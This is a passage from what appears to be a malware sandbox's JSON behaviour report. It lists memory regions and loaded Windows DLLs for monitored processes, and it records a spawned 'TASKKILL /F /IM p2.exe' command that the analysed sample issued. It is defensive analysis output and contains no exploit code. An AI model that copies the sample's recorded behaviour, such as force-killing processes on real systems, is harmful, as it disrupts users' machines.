"start_va": 9437184, "type": "region", "version": 1 }, "end_va": 9699327, "entry_point": 0, "filename": null, "id": "region_4847", "name": "private_0x0000000000900000", "norm_filename": null, "region_type": "private_memory", "start_va": 9437184, "timestamp": "00:01:36.376", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 11403264, "type": "region", "version": 1 }, "end_va": 12980223, "entry_point": 0, "filename": null, "id": "region_4848", "name": "pagefile_0x0000000000ae0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 11403264, "timestamp": "00:01:36.376", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 13041664, "type": "region", "version": 1 }, "end_va": 34013183, "entry_point": 0, "filename": null, "id": "region_4849", "name": "pagefile_0x0000000000c70000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 13041664, "timestamp": "00:01:36.376", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_4850", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:36.376", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_4851", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:36.377", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1511423, "entry_point": 0, "filename": null, "id": "region_4852", "name": "pagefile_0x0000000000170000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1507328, "timestamp": "00:01:36.381", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1958543360, "type": "region", "version": 1 }, "end_va": 1958920191, "entry_point": 1958685512, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_4853", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1958543360, "timestamp": "00:01:36.381", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1958936576, "type": "region", "version": 1 }, "end_va": 1958977535, "entry_point": 1958941850, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_4854", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1958936576, "timestamp": "00:01:36.382", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 5701632, "type": "region", "version": 1 }, "end_va": 6750207, "entry_point": 0, "filename": null, "id": "region_4855", "name": "private_0x0000000000570000", "norm_filename": null, "region_type": "private_memory", "start_va": 5701632, "timestamp": "00:01:36.385", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 35979264, "type": "region", "version": 1 }, "end_va": 36241407, "entry_point": 0, "filename": null, "id": "region_4856", "name": "private_0x0000000002250000", "norm_filename": null, "region_type": "private_memory", "start_va": 35979264, "timestamp": "00:01:36.385", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1958346752, "type": "region", "version": 1 }, "end_va": 1958514687, "entry_point": 1958374169, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_4857", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1958346752, "timestamp": "00:01:36.385", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3211264, "type": "region", "version": 1 }, "end_va": 3473407, "entry_point": 0, "filename": null, "id": "region_4858", "name": "private_0x0000000000310000", "norm_filename": null, "region_type": "private_memory", "start_va": 3211264, "timestamp": "00:01:36.397", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4587520, "type": "region", "version": 1 }, "end_va": 4849663, "entry_point": 0, "filename": null, "id": "region_4859", "name": "private_0x0000000000460000", "norm_filename": null, "region_type": "private_memory", "start_va": 4587520, "timestamp": "00:01:36.397", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 36241408, "type": "region", "version": 1 }, "end_va": 39186431, "entry_point": 36241408, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_4860", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 36241408, "timestamp": "00:01:36.397", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_4861", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:36.397", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_4862", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:36.397", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_4863", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:36.398", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_4864", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:36.400", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4456447, "entry_point": 0, "filename": null, "id": "region_4865", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:01:36.450", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 8781824, "type": "region", "version": 1 }, "end_va": 9043967, "entry_point": 0, "filename": null, "id": "region_4866", "name": "private_0x0000000000860000", "norm_filename": null, "region_type": "private_memory", "start_va": 8781824, "timestamp": "00:01:36.450", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 34013184, "type": "region", "version": 1 }, "end_va": 34275327, "entry_point": 0, "filename": null, "id": "region_4867", "name": "private_0x0000000002070000", "norm_filename": null, "region_type": "private_memory", "start_va": 34013184, "timestamp": "00:01:36.450", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 34406400, "type": "region", "version": 1 }, "end_va": 34668543, "entry_point": 0, "filename": null, "id": "region_4868", "name": "private_0x00000000020d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 34406400, "timestamp": "00:01:36.450", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1958281216, "type": "region", "version": 1 }, "end_va": 1958342655, "entry_point": 1958289824, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_4869", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1958281216, "timestamp": "00:01:36.450", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_4870", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:36.451", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_4871", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:36.451", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1784086528, "type": "region", "version": 1 }, "end_va": 1784700927, "entry_point": 1784215737, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_4872", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1784086528, "timestamp": "00:01:36.457", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1958150144, "type": "region", "version": 1 }, "end_va": 1958248447, "entry_point": 1958155061, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_4873", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1958150144, "timestamp": "00:01:36.458", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM p2.exe /IM p2.exe", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_42", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 42, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_4874", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:37.034", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_4875", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:37.034", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_4876", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:37.034", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_4877", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:37.037", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_4878", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:37.037", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 720895, "entry_point": 0, "filename": null, "id": "region_4879", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:37.037", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 0, "filename": null, "id": "region_4880", "name": "private_0x0000000000230000", "norm_filename": null, "region_type": "private_memory", "start_va": 2293760, "timestamp": "00:01:37.037", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 3014656, "type": "region", "version": 1 }, "end_va": 3104767, "entry_point": 3038345, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_4881", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 3014656, "timestamp": "00:01:37.037", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_4882", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:37.038", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_4883", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:37.039", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_4884", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:37.039", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_4885", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:37.039", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_4886", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:37.039", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_4887", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:37.039", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_4888", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:37.040", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_4889", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:37.040", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_4890", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:37.040", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 2293759, "entry_point": 0, "filename": null, "id": "region_4891", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:01:37.044", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_4892", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:37.044", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_4893", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:37.045", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_4894", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:37.045", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_4895", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:37.046", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_4896", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:37.046", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_4897", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:37.069", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_4898", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:37.069", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 1142783, "entry_point": 720896, "filename": "\\Windows\\System32\\locale.nls", "id": "region_4899", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 720896, "timestamp": "00:01:37.069", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 5242879, "entry_point": 0, "filename": null, "id": "region_4900", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:01:37.069", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 6750208, "type": "region", "version": 1 }, "end_va": 6815743, "entry_point": 0, "filename": null, "id": "region_4901", "name": "private_0x0000000000670000", "norm_filename": null, "region_type": "private_memory", "start_va": 6750208, "timestamp": "00:01:37.069", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1783758848, "type": "region", "version": 1 }, "end_va": 1784721407, "entry_point": 1783763918, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_4902", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1783758848, "timestamp": "00:01:37.069", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_4903", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:37.070", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_4904", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:37.070", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_4905", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:37.071", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1958936576, "type": "region", "version": 1 }, "end_va": 1958998015, "entry_point": 1958941345, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_4906", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1958936576, "timestamp": "00:01:37.071", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1959067648, "type": "region", "version": 1 }, "end_va": 1959284735, "entry_point": 1959072725, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_4907", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1959067648, "timestamp": "00:01:37.072", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1959329792, "type": "region", 